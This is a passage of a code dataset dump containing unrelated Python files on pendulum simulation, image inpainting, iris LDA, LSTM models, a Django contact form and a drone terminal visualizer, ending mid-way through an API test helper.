len(us)\n\n\nprint(\"computing index sets\")\nt0 = time.time()\nDeltas = np.copy(Xnext)\ndelta_qs = 
[]\ndelta_ws = []\n\nQOptions = np.zeros((Nq, Nw), dtype=int)\nWOptions = np.zeros((Nq, Nw), dtype=int)\n\nQMax = np.zeros((Nq, Nw))\nWMax = np.zeros((Nq, Nw))\n\nprint('next omega range effected by u:')\nprint(Xnext[1, round(Nq/2), round(Nw/2), :])\nprint('next theta range effected by omega:')\nprint(Xnext[0, round(Nq/2), :, round(Nu/2)])\nsys.exit()\n\nfor kq in range(Nq):\n for kw in range(Nw):\n q_set = set(Xnext[0, kq, kw, :])\n w_set = set(Xnext[1, kq, kw, :])\n\n# print(len(q_set))\n# print(len(w_set))\n QOptions[kq, kw] = len(q_set)\n WOptions[kq, kw] = len(w_set)\n\n QMax[kq, kw] = qs[max(q_set)]\n WMax[kq, kw] = ws[max(w_set)]\n\nt1 = time.time()\nprint(\"computed delta indexes in %.1f seconds\" % (t1 - t0))\n\nplt.subplot(2, 2, 1)\nX, Y = np.meshgrid(qs, ws)\nS = plt.contourf(X, Y, QOptions.T)\ncbar = plt.colorbar(S)\ncbar.ax.set_ylabel('q opt')\nplt.xlabel('theta [rad]')\nplt.ylabel('omega [rad/s]')\nplt.title('q options')\n\n\nplt.subplot(2, 2, 2)\nX, Y = np.meshgrid(qs, ws)\nS = plt.contourf(X, Y, WOptions.T)\ncbar = plt.colorbar(S)\ncbar.ax.set_ylabel('w opt')\nplt.xlabel('theta [rad]')\nplt.ylabel('omega [rad/s]')\nplt.title('w options')\n\n\nplt.subplot(2, 2, 3)\nX, Y = np.meshgrid(qs, ws)\nS = plt.contourf(X, Y, QMax.T)\ncbar = plt.colorbar(S)\ncbar.ax.set_ylabel('max q')\nplt.xlabel('theta [rad]')\nplt.ylabel('omega [rad/s]')\nplt.title('max q')\n\n\nplt.subplot(2, 2, 4)\nX, Y = np.meshgrid(qs, ws)\nS = plt.contourf(X, Y, WMax.T)\ncbar = plt.colorbar(S)\ncbar.ax.set_ylabel('max w')\nplt.xlabel('theta [rad]')\nplt.ylabel('omega [rad/s]')\nplt.title('max w')\n\n\n\n#\n#plt.subplot(2, 2, 4)\n#plt.hist(delta_qs, bins=np.max(delta_qs) - np.min(delta_qs) + 1)\n#plt.title('delta theta')\n#\n#plt.subplot(2, 2, 3)\n#plt.hist(delta_ws, bins=np.max(delta_ws) - np.min(delta_ws) + 1)\n#plt.title('delta 
omega')\n\nplt.show()\n","sub_path":"torque_pendulum/state_transition_stats.py","file_name":"state_transition_stats.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"485673395","text":"# -- coding utf-8 --\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport math\r\n\r\ng = 9.8\r\nl1 = 0.5\r\nl2 = 1.0\r\nl3 = 1.5\r\nl4 = 2.0\r\nini_x = 1.5\r\nini_v = 0\r\nini_a = 0\r\ndt = 0.001\r\nt = np.arange(0,10,dt)\r\np1 = []\r\np2 = []\r\np3 = []\r\np4 = []\r\n\r\nx = ini_x\r\nv = ini_v\r\na = ini_a\r\nfor i in range(len(t)):\r\n\tp1.append(x)\r\n\ta = - g/l1*math.sin(x)\r\n\tv += a*dt\r\n\tx += v*dt\r\n\r\nx = ini_x\r\nv = ini_v\r\na = ini_a\r\nfor i in range(len(t)):\r\n\tp2.append(x)\r\n\ta = - g/l2*math.sin(x)\r\n\tv += a*dt\r\n\tx += v*dt\r\n\r\nx = ini_x\r\nv = ini_v\r\na = ini_a\r\nfor i in range(len(t)):\r\n\tp3.append(x)\r\n\ta = - g/l3*math.sin(x)\r\n\tv += a*dt\r\n\tx += v*dt\r\n\r\nx = ini_x\r\nv = ini_v\r\na = ini_a\r\nfor i in range(len(t)):\r\n\tp4.append(x)\r\n\ta = - g/l4*math.sin(x)\r\n\tv += a*dt\r\n\tx += v*dt\r\n\r\nplt.plot(t,p1,'b',t,p2,'r',t,p3,'k',t,p4,'g')\r\nplt.text(7.6,1.8,u'',color='black',ha='center',fontsize=16)\r\nplt.text(7.6,1.7,u'l=0.5',color='blue',ha='center',fontsize=8)\r\nplt.text(7.6,1.6,u'l=1.0',color='red',ha='center',fontsize=8)\r\nplt.text(7.6,1.5,u'l=1.5',color='black',ha='center',fontsize=8)\r\nplt.text(7.6,1.4,u'l=2.0',color='green',ha='center',fontsize=8)\r\nplt.legend(loc='down right',frameon=False)\r\nplt.title('',fontsize=28)\r\nplt.xlabel('$time(s)$',fontsize=20)\r\nplt.ylabel(u'$\\u03B8(radians)$',fontsize=20)\r\nplt.ylim(-3,3.0)\r\nplt.show()\r\n\r\n\r\n","sub_path":"8/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"213445078","text":"import cv2\nimport numpy as np\nfrom matplotlib import 
pyplot as plt\nimport matplotlib.image as mpimg\nimport imutils\nfrom numpy import random\nimport scipy.misc\nfrom PIL import Image\nfrom numpy import sqrt\nimport time\nfrom utils import genSquare\n\n# imagen a procesar\nimg = cv2.imread('output3/imagen.jpeg', 3)\n# mascara con area a remover.\n# la zona negra (0,0,0) es la que se remueve, la blanca se deja como esta (255,255,255)\nmask = cv2.imread(\"output3/mask.jpeg\")\n# imagen pasada a escala de grises se guarda en esta variable\ngrey_scale = np.zeros(img.shape, dtype=np.uint8) #uint8\n\n\n#lado de los cuadrados que utilizaremos para rellenar la imagen\nsquare_size = 5\n\n# guardamos en un arreglo las coordenadas que describen al cuadrado\nsquare = genSquare(square_size)\n\n\n# tamanio del cuadrado de busqueda para el parche que reemplaza la posicion a rellenear\nsearch_square_size = 1000\n\n# cuantas veces buscamos al azar por un parche\nsearch_times = 100\n\n\ndef procesar(imagen, mask):\n iteraciones = 1000\n\n lower = np.array([0, 0, 0])\n upper = np.array([15, 15, 15])\n # re-mapeamos a 0-1 la mascara. 
1 es para la zona retocada, 0 para la que no\n shapeMask = cv2.inRange(mask, lower, upper)\n\n c = shapeMask[:, :] == 0 # maxima confianza en la zona que no se retoca\n\n for iteracion in range(iteraciones):\n # primero detectamos el borde de la mascara\n\n lower = np.array([0, 0, 0])\n upper = np.array([15, 15, 15])\n shapeMask = cv2.inRange(mask, lower, upper)\n\n ## conseguimos un arreglo con todos los contornos\n\n cnts = cv2.findContours(shapeMask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n cnts = imutils.grab_contours(cnts)\n # cada contorno cerrado forma un arreglo\n\n # luego tenemos que calcular la funcion de costos\n best_benefit = 0\n best_benefit_point = None\n\n # conseguimos la escala de grises\n grey_scale = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # conseguimos el gradiente en x e y de la escala de grises, la funcion sobel no solo hace gradiente\n # sino que suaviza\n sobel_x = cv2.Sobel(grey_scale, cv2.CV_64F, 1, 0, ksize=5)\n sobel_y = cv2.Sobel(grey_scale, cv2.CV_64F, 0, 1, ksize=5)\n sobel_x, sobel_y = -sobel_y,sobel_x\n\n # por cada contorno cerrado\n for contorno in range(len(cnts)):\n\n ## necesitamos generar las normales de cada punto del contorno\n border_normal = []\n\n n = len(cnts[contorno])\n\n for i in range(n):\n #print(cnts[0][i])\n\n dx = cnts[contorno][i][0][0] - cnts[contorno][(i-1) % n][0][0]\n dy = cnts[contorno][i][0][1] - cnts[contorno][(i-1) % n][0][1]\n\n border_normal.append((dy, -dx))\n # esta formula nos da la normal. 
no le damos importancia a la orientacion\n\n index = 0\n\n for border_point in cnts[contorno]:\n x, y = border_point[0]\n\n # consigo la confianza del punto del contorno actual\n confidence = 0\n\n for dx, dy in square:\n if shapeMask[y + dy, x + dx] == 0: # si fuera de la region a retocar\n confidence += c[y + dy, x + dx]\n\n confidence /= len(square)\n\n # consigo la componente normal del gradiente\n nx, ny = border_normal[index]\n\n # consigo el gradiente mas grande de la region\n\n max_grad = 0\n max_grad_value = 0, 0\n\n for dx, dy in square:\n # solo sumamos si esta fuera de la zona a retocar\n if shapeMask[y + dy, x + dx] == 0:\n\n dx = np.sum(sobel_x[y][x])/3 # promediamos los tres componentes del gradiente\n dy = np.sum(sobel_y[y][x])/3\n\n p = dx ** 2 + dy ** 2\n if p > max_grad: # buscamos el mayor gradiente en norma\n max_grad = p\n max_grad_value = dx, dy\n\n # producto escalar del gradiente con la normal acorde a la formula\n\n d = max_grad_value[0] * nx + max_grad_value[1] * ny\n\n # el beneficio es la confianza por el factor d\n\n benefit = abs(d * confidence)\n\n # buscamos maximizar el beneficio\n if benefit > best_benefit:\n best_benefit = benefit\n best_benefit_point = x, y\n\n if not best_benefit_point:\n print(\"No hay mas borde. 
Fin\")\n break\n\n # ahora vamos a calcular el parche que minimize la distancia\n\n px, py = best_benefit_point\n\n best_patch = px, py # default\n patch_distance = np.Infinity\n\n for i in range(search_times):\n # x = random.randint(px - search_square_size//2, px + search_square_size//2)\n # y = random.randint(py - search_square_size//2, py + search_square_size//2)\n x = int(random.normal(px, search_square_size//2**5,1))\n y = int(random.normal(py, search_square_size//2**5,1))\n\n if shapeMask[y, x] == 255:\n continue # no es de interes ya que esta en la region blanca\n\n #patch = imagen[y - square_size//2:y + square_size//2, x - square_size//2:x + square_size//2]\n #original = imagen[py - square_size//2:py + square_size//2, px - square_size//2:px + square_size//2]\n #total_sum = np.array([0])\n total_sum = 0\n # decidi usar fors porque se me estaban copiando los arreglos y en definitiva como son\n # todas operaciones elemento a elemento no son optimizables\n\n for yi in range(-square_size//2, square_size//2):\n for xi in range(-square_size//2, square_size//2):\n sum = 0\n for cmp in range(3):\n patch = int(imagen[y + yi][x + xi][cmp])\n original = int(imagen[py + yi][px + xi][cmp])\n\n sum += (patch - original)**2\n sum = sqrt(sum)\n #np.append(total_sum,sum**2)\n total_sum += sum**2\n #total_sum = total_sum.sum()\n #print(np.square(patch-original))\n\n if total_sum < patch_distance:\n patch_distance = sum\n best_patch = x, y\n\n bx, by = best_patch # best_patch_x, best_patch_y\n\n imagen[py - square_size//2: py + square_size//2, px - square_size//2: px + square_size//2] = \\\n imagen[by - square_size//2: by + square_size//2, bx - square_size//2: bx + square_size//2]\n\n ## copiamos la confianza del parche elegido a la la confianza del lugar donde copiamos el parche\n c[py - square_size // 2: py + square_size // 2, px - square_size // 2: px + square_size // 2] = \\\n c[by - square_size // 2: by + square_size // 2, bx - square_size // 2: bx + square_size // 
2]*0.99\n\n ## marcamos la zona reemplazada como blanca\n mask[py - square_size // 2: py + square_size // 2, px - square_size // 2: px + square_size // 2] = \\\n [255, 255, 255]\n\n im2 = np.copy(imagen)\n\n if iteracion % 20 == 0:\n print(\"Iteracion \", iteracion)\n #for cnt in cnts:\n # cv2.drawContours(im2, [np.array(cnt)], 0, (255, 255, 0), 1)\n\n #cv2.drawContours(im2, [np.array([best_benefit_point])], 0, (0, 0, 255), 5)\n im = Image.fromarray(cv2.cvtColor(im2, cv2.COLOR_BGR2RGB))\n im.save(\"output3/imagen\" + str(iteracion) + \".jpeg\")\n\n #plt.imshow(cv2.cvtColor(im2, cv2.COLOR_BGR2RGB))\n #plt.savefig(\"output/imagen\" + str(iteracion) + \".jpeg\", dpi=1000)\n #scipy.misc.toimage(im2).save(\"output/imagen\" + str(iteracion) + \".jpeg\")\n\n\n #plt.imshow(cv2.cvtColor(mask, cv2.COLOR_BGR2RGB))\n #plt.savefig(\"output_mask/image/n\" + str(iteracion) + \".jpeg\", dpi=1000)\n #plt.show()\n\n\n\n #plt.imshow(cv2.cvtColor(imagen, cv2.COLOR_BGR2RGB))\n #plt.show()\n\n\n#img_intensity = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n#cv2.mixChannels(img, img_intensity)\n\n#print(img_intensity)\n#\nstart_time = time.time()\nprocesar(img, mask)\nend_time = time.time()\nprint(\"se calculo en:\", (end_time-start_time)/60, \" minutos\")\n#\n# plt.imshow(img2, cmap=\"gray\")\n\n#sobelx = cv2.Sobel(img_intensity, cv2.CV_64F, 1, 0, ksize=9)\n#sobely = cv2.Sobel(img_intensity, cv2.CV_64F, 0, 1, ksize=9)\n\n#print(img)\n\n#plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n\n#plt.imshow(sobelx, cmap=\"gray\")\n\n\n\n#plt.show()\n\n\n\n\n\n","sub_path":"InformeDefinitivo/informeNuevo/difusion/difusion_updated/archivos_viejos/viejomain.py","file_name":"viejomain.py","file_ext":"py","file_size_in_byte":8644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"145379389","text":"\"\"\"\nexercicio 37\nEscreva um programa que leia um número inteiro qualquer e peça para o usuário escolher qual será a base de conversão:\n1 - binário\n2 
- octal\n3 - hexadecimal\n\"\"\"\nnum = int(input(\"Digite um número: \"))\nbase = int(input(\"\"\"\\n\\nEscolha a base de conversão:\n1 - binário\n2 - octal\n3 - hexadecimal\n\"\"\"))\ntipo = 'nenhum'\nif base == 1:\n\ttipo = 'binário'\n\tconv = bin(num)\nelif base == 2:\n\ttipo = 'octal'\n\tconv = oct(num)\nelif base == 3:\n\ttipo = 'hexadecimal'\n\tconv = hex(num)\nprint(\"\\n\\nO número {} em {}, fica {}\".format(num, tipo, conv[2:]))\n","sub_path":"conversão.py","file_name":"conversão.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"314551760","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# F.R.E.D project (c) 2015\n\nfrom control.utils import Vector3D\nfrom config import Config\nfrom terminal import Colors\nfrom grid import block_types\n\n\"\"\" Visualizes the app in terminal\n\n @author F.R.E.D authors\n\"\"\"\n\nclass Camera:\n\n def __init__(self):\n self.pos = Vector3D()\n\n def set_bounds(self, x, y):\n self.pos.x = x\n self.pos.y = y\n\nclass Visualizer2D:\n\n def __init__(self, gridsystem, control, route, terminal):\n self.window_id = \"\"\n self.legend_window_id = \"\"\n self.gridsystem = gridsystem\n self.control = control\n self.route = route\n self.camera = Camera()\n self.set_bounds(0, 0)\n self.terminal = terminal\n self._info_mode = False\n self.options = {\n block_types.AIR: ' ', # Air\n block_types.OBSTACLE: 'x', # Obstacle\n block_types.DANGER: 'o', # Danger\n block_types.WAYPOINT: 'W', # Waypoint\n block_types.EXIT: 'E', # EXIT,\n block_types.OBSTACLE_DYNAMIC: 'd' # Dynamic obstacle\n }\n self.colors = {\n block_types.AIR: Colors.WHITE,\n block_types.OBSTACLE: Colors.WHITE_FULL,\n block_types.DANGER: Colors.RED_FULL,\n block_types.WAYPOINT: Colors.BLUE,\n block_types.EXIT: Colors.YELLOW,\n block_types.OBSTACLE_DYNAMIC: Colors.MAGENTA\n }\n self.desc = {\n block_types.AIR: \"Air (passable space)\",\n block_types.OBSTACLE: 
'Obstacle',\n block_types.DANGER: 'Danger',\n block_types.WAYPOINT: 'Waypoint',\n block_types.EXIT: 'Exit',\n block_types.OBSTACLE_DYNAMIC: 'Dynamic obstacle (can move over time)'\n }\n\n def info_mode(self, mode):\n self._info_mode = mode\n\n def set_bounds(self, x, y):\n self.camera.set_bounds(x, y)\n\n def show(self, screenX, screenY):\n if len(self.window_id) == 0:\n self.window_id = self.terminal.register_window(screenX, screenY, self.gridsystem.width() * 2 + screenX, self.gridsystem.length() + screenY)\n for y in range(self.camera.pos.y, self.camera.pos.y + self.gridsystem.y_block_count()):\n screenX = self.camera.pos.x\n for x in range(self.camera.pos.x, self.camera.pos.x + self.gridsystem.x_block_count()):\n self._print_block(screenX, y, x, y)\n self._print_block(screenX + 1, y, x, y)\n screenX += 2\n self.terminal.refresh(self.window_id)\n\n def legend(self, screenX, screenY):\n if len(self.legend_window_id) == 0:\n self.legend_window_id = self.terminal.register_window(screenX, screenY, 50, len(self.desc))\n line = 0\n for key, value in self.desc.iteritems():\n text = self.options[key] + \" - \" + value\n color = self.colors[key]\n if key == block_types.DANGER:\n color = Colors.RED\n elif key == block_types.OBSTACLE:\n color = Colors.WHITE\n self.terminal.print_text(self.legend_window_id, 0, line, text, color)\n line += 1\n self.terminal.refresh(self.legend_window_id)\n\n def _is_current_drone_position(self, x, y):\n drone_x = self.gridsystem.indexify(self.control.get_current_position().x)\n drone_y = self.gridsystem.indexify(self.control.get_current_position().y)\n return drone_x == x and drone_y == y\n\n def _is_route_point(self, x, y):\n for z in range(0, Config.GRID_HEIGHT):\n if self.route.contains(x * Config.SCALE, y * Config.SCALE, z * Config.SCALE):\n return True\n return False\n\n def _get_highest_block(self, x, y):\n highest_block = 0\n for z in range(0, Config.GRID_HEIGHT):\n block = self.gridsystem.get(x * Config.SCALE, y * Config.SCALE, z)\n 
if block > highest_block:\n current_block = block\n return current_block\n\n def _print_block(self, screenX, screenY, gridX, gridY):\n try:\n block = self._get_highest_block(gridX, gridY)\n if self._info_mode and self._is_route_point(gridX, gridY) and block == block_types.AIR:\n # Route\n self.terminal.print_text(self.window_id, screenX, screenY, 'o', Colors.YELLOW_FULL)\n elif not self._is_current_drone_position(gridX, gridY):\n if block == block_types.WAYPOINT and not self._info_mode:\n return\n # Background\n self.terminal.print_text(self.window_id, screenX, screenY, self.options[block], self.colors[block])\n if self._is_current_drone_position(gridX, gridY):\n # Drone\n self.terminal.print_text(self.window_id, screenX, screenY, 'F', Colors.GREEN_FULL)\n except Exception as e:\n self.terminal.print_text(self.window_id, 0, 0, str(e), self.colors[block])\n","sub_path":"core/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":4980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"517045837","text":"from sklearn import datasets\nimport numpy as np\nfrom numpy.linalg import inv\nimport matplotlib.pyplot as plt\n\n# Classes C2 and C3\n\niris = datasets.load_iris()\nX1 = np.array(iris.data[50:100, :])\nX2 = np.array(iris.data[100:150, :])\nX = np.concatenate((X1, X2))\n\nm1 = np.array([0.02*np.sum(X1[:, n]) for n in range(4)])\nm2 = np.array([0.02*np.sum(X2[:, n]) for n in range(4)])\n\nprint('m1 = ', m1)\nprint('m2 = ', m2)\n\nsw = X1.T.dot(X1)-m1.T.dot(m1) + X2.T.dot(X2)-m2.T.dot(m2)\n\nprint('Sw = ', sw)\n\nw = inv(sw).dot(m2-m1)\n\nprint('w = ', w)\n\ny = X.dot(w)\n\nplt.figure()\ncolors = ['turquoise', 'orange']\nlw = 2\n\ny = np.where(y < 0, 0, 1)\n\n# print(X[y == 0, 0])\n# print(X[y == 1, 0])\nfor color, i in zip(colors, [0, 1]):\n plt.scatter(X[y == i, 0], X[y == i, 1], color=color, alpha=.8, lw=lw)\n# plt.legend(loc='best', shadow=False, scatterpoints=1)\nplt.title('LDA IRIS C2 X 
C3')\nplt.xlabel('Sepal.Length')\nplt.ylabel('Sepal.Width')\nplt.show()\n","sub_path":"codigos/tarefa4_13.py","file_name":"tarefa4_13.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"485208362","text":"import torch\nimport torch.nn as nn\n\nDEVICE = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n\nclass Encoder(nn.Module):\n def __init__(self, input_sz: int, hidden_sz: int, in_pad_idx: int, num_layer: int, embed_sz: int):\n super(Encoder, self).__init__()\n self.input_sz = input_sz\n self.hidden_sz = hidden_sz\n self.num_layer = num_layer\n self.embed = nn.Embedding(input_sz, embed_sz, in_pad_idx)\n self.lstm = nn.LSTM(embed_sz, hidden_sz, num_layers=num_layer)\n\n def forward(self, input: torch.Tensor, non_padded_len: torch.Tensor, hidden: torch.Tensor = None):\n batch_sz = input.shape[1]\n embedded_input = self.embed(input)\n pps_input = nn.utils.rnn.pack_padded_sequence(\n embedded_input, non_padded_len, enforce_sorted=False)\n\n hidden = self.init_hidden(batch_sz)\n\n _, hidden = self.lstm.forward(pps_input, hidden)\n\n return hidden\n\n def init_hidden(self, batch_sz: int):\n return (torch.zeros(self.num_layer, batch_sz, self.hidden_sz).to(DEVICE),\n torch.zeros(self.num_layer, batch_sz, self.hidden_sz).to(DEVICE))\n\n\nclass Decoder(nn.Module):\n def __init__(self, input_sz: int, hidden_sz: int, in_pad_idx: int, num_layer: int, embed_sz: int,\n drop_out: float = 0.1):\n super(Decoder, self).__init__()\n self.input_sz = input_sz\n self.hidden_sz = hidden_sz\n self.num_layer = num_layer\n self.embed = nn.Embedding(input_sz, embed_sz, in_pad_idx)\n self.lstm = nn.LSTM(embed_sz, hidden_sz, num_layers=num_layer)\n self.sigmoid = nn.Sigmoid()\n self.fc1 = nn.Linear(hidden_sz, input_sz)\n self.drop_out = nn.Dropout(drop_out)\n self.softmax = nn.LogSoftmax(dim=2)\n\n def forward(self, input: torch.Tensor, hidden: torch.Tensor):\n embedded_input = self.embed(input)\n 
output, hidden = self.lstm(embedded_input, hidden)\n sigmoid_out = self.sigmoid(output)\n fc1_out = self.fc1(sigmoid_out)\n output = self.drop_out(fc1_out)\n probs = self.softmax(output)\n\n return probs, hidden\n","sub_path":"model/ReverseAE.py","file_name":"ReverseAE.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"87705753","text":"#!/usr/bin/python\nfrom sklearn import svm\nfrom sklearn import cross_validation\nimport numpy as np\ndef process_category(category,data):\n svc=svm.SVC(C=10)\n X=[]\n Y=[]\n for unit in data:\n vec=data[unit]['vector']\n X.append(vec)\n if data[unit]['actual']!=category:\n Y.append(-1)\n else:\n Y.append(1)\n\n dataX=np.array(X)\n dataY=np.array(Y)\n svc=svm.SVC(C=10)\n svc.fit(dataX,dataY)\n score=cross_validation.cross_val_score(svc,dataX,dataY,cv=10)\n return score\n\n#-----script entry\ngames={}\n#read raw data\nheader=True\nfor line in file('feedData.txt'):\n #skip header\n if header:\n header=False\n continue\n tuples=line.strip().split('\\t')\n gameName=tuples[0]\n games[gameName]={}\n games[gameName]['vector']=[float(wc) for wc in tuples[1:]]\n#read category file\nfor line in file('p2_table.txt'):\n tuples=line.strip().split('\\t')\n gname=tuples[0]\n games[gname]['actual']=tuples[2]\n#classification\ncatetories=['fighting','sports','rpg','arpg','racing','platform','action','fps']\nfor c in catetories:\n performance=process_category(c,games)\n print('Category: %s'%c)\n for score in performance:\n print(score),\n print(score.mean())","sub_path":"assignments/a10/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"108192246","text":"import logging\n\nfrom django import forms\nfrom django.conf import settings\nfrom django.core.mail import send_mail\nfrom django.template import loader\nfrom 
django.utils.translation import ugettext_lazy as _\nfrom wagtail.wagtailcore.models import Site\n\nfrom core.models import ComsesGroups, SocialMediaSettings\n\nlogger = logging.getLogger(__name__)\n\n\nclass ContactForm(forms.Form):\n name = forms.CharField(max_length=100, label=_('Your name'))\n email = forms.EmailField(max_length=255, label=_('Your email address'))\n subject_text = forms.CharField(max_length=100, label=_('Message subject'))\n body = forms.CharField(widget=forms.Textarea, label=_('Your message'))\n\n subject_template_name = 'home/about/contact_form_subject.txt'\n template_name = 'home/about/contact_form_email.txt'\n from_email = settings.DEFAULT_FROM_EMAIL\n\n def __init__(self, request=None, initial=None, *args, **kwargs):\n if request is None:\n raise ValueError(\"kwarg request is required\")\n if initial is None:\n initial = {}\n self.request = request\n if request.user.is_authenticated:\n user = request.user\n initial.update(name=user.member_profile.name,\n email=user.email)\n super().__init__(initial=initial, *args, **kwargs)\n\n def get_context(self):\n if not self.is_valid():\n raise ValueError(\"Cannot get_context() from invalid contact form\")\n site = Site.objects.first()\n return dict(self.cleaned_data, site=site)\n\n @property\n def recipient_list(self):\n return SocialMediaSettings.for_site(self.request.site).contact_form_recipients\n\n @property\n def subject(self):\n subject = loader.render_to_string(\n self.subject_template_name, self.get_context(), request=self.request\n )\n return ''.join(subject.splitlines())\n\n @property\n def message(self):\n \"\"\"\n Returns the template rendered message body as a string.\n :return:\n \"\"\"\n return loader.render_to_string(\n self.template_name, self.get_context(), request=self.request\n )\n\n def save(self, fail_silently=False):\n if not self.is_valid():\n raise ValueError(\"Can't send a message from invalid contact form\")\n message_dict = {\n 'from_email': self.cleaned_data.get('email') 
or self.from_email,\n 'recipient_list': self.recipient_list,\n 'subject': self.subject,\n 'message': self.message,\n }\n send_mail(fail_silently=fail_silently, **message_dict)\n","sub_path":"django/home/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"204959037","text":"from django import forms\n\nfrom .models import Documentation\n\n\nclass DocUploadForm(forms.ModelForm):\n '''Form for documentation file upload'''\n class Meta(object):\n model = Documentation\n fields = [\n \"name\",\n \"doc_file\", \n ]\n widgets = {\n 'name': forms.TextInput(attrs={'placeholder': 'Enter Title','class': 'form-control'}),\n }\n","sub_path":"docupload/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"462141493","text":"import numpy\nimport pickle\nimport glob\n\nfrom music21 import corpus, converter\n\nfrom keras.models import Model\nfrom keras.layers import LSTM, Input, Dropout, Dense, Activation, Embedding, Concatenate\nfrom keras.optimizers import RMSprop\nfrom keras.utils import np_utils\n\ndef get_music_list(name):\n \n if name == 'bach':\n file_list = ['bwv' + str(x['bwv']) for x in corpus.chorales.ChoraleList().byBWV.values()]\n parser = corpus\n elif name == 'local':\n file_list = glob.glob(\"midi_songs/*.mid\")\n parser = converter\n \n return file_list, parser\n\ndef create_network(n_notes, n_durations, seq_len = None, embed_size = 100):\n \"\"\" create the structure of the neural network \"\"\"\n\n notes_in = Input(shape = (seq_len,))\n durations_in = Input(shape = (seq_len,))\n\n x1 = Embedding(n_notes, embed_size)(notes_in)\n x2 = Embedding(n_durations, embed_size)(durations_in) \n\n x = Concatenate()([x1,x2])\n\n x = LSTM(256, return_sequences=True)(x)\n x = Dropout(0.2)(x)\n x = LSTM(256)(x)\n x = 
Dropout(0.2)(x)\n notes_out = Dense(n_notes, activation = 'softmax')(x)\n durations_out = Dense(n_durations, activation = 'softmax')(x)\n\n model = Model([notes_in, durations_in], [notes_out, durations_out])\n\n # model.summary()\n\n opti = RMSprop(lr = 0.001)\n model.compile(loss=['categorical_crossentropy', 'categorical_crossentropy'], optimizer=opti)\n\n return model\n\n\ndef get_distinct(elements):\n # Get all pitch names\n element_names = sorted(set(elements))\n n_elements = len(element_names)\n return (element_names, n_elements)\n\ndef create_lookups(element_names):\n # create dictionary to map notes and durations to integers\n element_to_int = dict((element, number) for number, element in enumerate(element_names))\n int_to_element = dict((number, element) for number, element in enumerate(element_names))\n\n return (element_to_int, int_to_element)\n \n\ndef prepare_sequences(notes, durations, lookups, distincts):\n \"\"\" Prepare the sequences used to train the Neural Network \"\"\"\n sequence_length = 32\n\n note_to_int, int_to_note, duration_to_int, int_to_duration = lookups\n note_names, n_notes, duration_names, n_durations = distincts\n\n notes_network_input = []\n notes_network_output = []\n durations_network_input = []\n durations_network_output = []\n\n # create input sequences and the corresponding outputs\n for i in range(len(notes) - sequence_length):\n notes_sequence_in = notes[i:i + sequence_length]\n notes_sequence_out = notes[i + sequence_length]\n notes_network_input.append([note_to_int[char] for char in notes_sequence_in])\n notes_network_output.append(note_to_int[notes_sequence_out])\n\n durations_sequence_in = durations[i:i + sequence_length]\n durations_sequence_out = durations[i + sequence_length]\n durations_network_input.append([duration_to_int[char] for char in durations_sequence_in])\n durations_network_output.append(duration_to_int[durations_sequence_out])\n\n n_patterns = len(notes_network_input)\n\n # reshape the input into a format 
compatible with LSTM layers\n notes_network_input = numpy.reshape(notes_network_input, (n_patterns, sequence_length))\n durations_network_input = numpy.reshape(durations_network_input, (n_patterns, sequence_length))\n network_input = [notes_network_input, durations_network_input]\n\n notes_network_output = np_utils.to_categorical(notes_network_output, num_classes=n_notes)\n durations_network_output = np_utils.to_categorical(durations_network_output, num_classes=n_durations)\n network_output = [notes_network_output, durations_network_output]\n\n return (network_input, network_output)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"614086293","text":"\"\"\"\nUtility functions\n\"\"\"\nimport requests\nimport random\nimport string\nimport json\nimport os\nimport urllib.parse\nfrom lambda_code.lambda_function import lambda_handler\nfrom lambda_code.constants import MAX_USERNAME_SIZE, GET_REQUEST_STR, POST_REQUEST_STR, HTTP_METHOD_STR, \\\n PASSWORD_HASH_SIZE, HASH_CHARS, DELETE_REQUEST_STR\nfrom BuildConstants import IMPLEMENTED_HTTP_METHODS\n\n_REQUEST_URL = \"https://mvmb9qdwti.execute-api.us-west-1.amazonaws.com/WingitProduction/wingitresource\"\n_HEX_CHARS = \"0123456789abcdefABCDEF\"\n_INIT_RECIPES_DIR = \"./initial_recipes\"\n\nREQUEST_TYPE_ONLINE = True # Whether or not we are testing online or offline\n\n\ndef set_request_type_online(request_type_is_online):\n \"\"\"\n Call this with boolean input to determine if we should test online or offline\n :param request_type_is_online: boolean\n \"\"\"\n global REQUEST_TYPE_ONLINE\n REQUEST_TYPE_ONLINE = request_type_is_online\n\n\ndef request(**params):\n \"\"\"\n Sends a request to the API with the given params\n :param params: a kwargs list of params\n :return: the response from the server\n \"\"\"\n http_method = params[HTTP_METHOD_STR]\n\n if 